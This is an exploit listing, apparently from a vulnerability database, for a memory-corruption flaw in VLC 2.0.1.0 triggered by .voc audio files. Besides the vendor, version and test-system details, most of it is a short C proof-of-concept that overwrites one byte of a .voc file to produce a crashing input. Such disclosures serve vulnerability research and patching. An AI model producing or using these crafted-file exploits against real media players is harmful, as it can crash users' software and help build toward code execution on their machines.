Skip to content

VLC v. 2.0.1.0 .voc Memory Corruption

Exploit Title: VLC v. 2.0.1.0 .voc Memory Corruption

Date: 3/18/2012

Author: Dan Fosco

Vendor or Software Link: www.videolan.org

Version: 2.0.1.0

Category: local

Tested on: Windows XP SP3 (64-bit)

Tested on stable 2.0, 1.1.11, 2.0.1.0 (newest release as of 3/15/2012)

#include <stdio.h>

int main(int argc, char *argv[]) { FILE *f; f = fopen(argv[1], "r+");

fseek(f, 20, SEEK_SET);
fputc('\xff', f);

fclose(f);
return 0;

}

//code updates .voc file, can find samples on videolan ftp server

To upload designs, you'll need to enable LFS and have an admin enable hashed storage. More information

VideoLAN code repository instance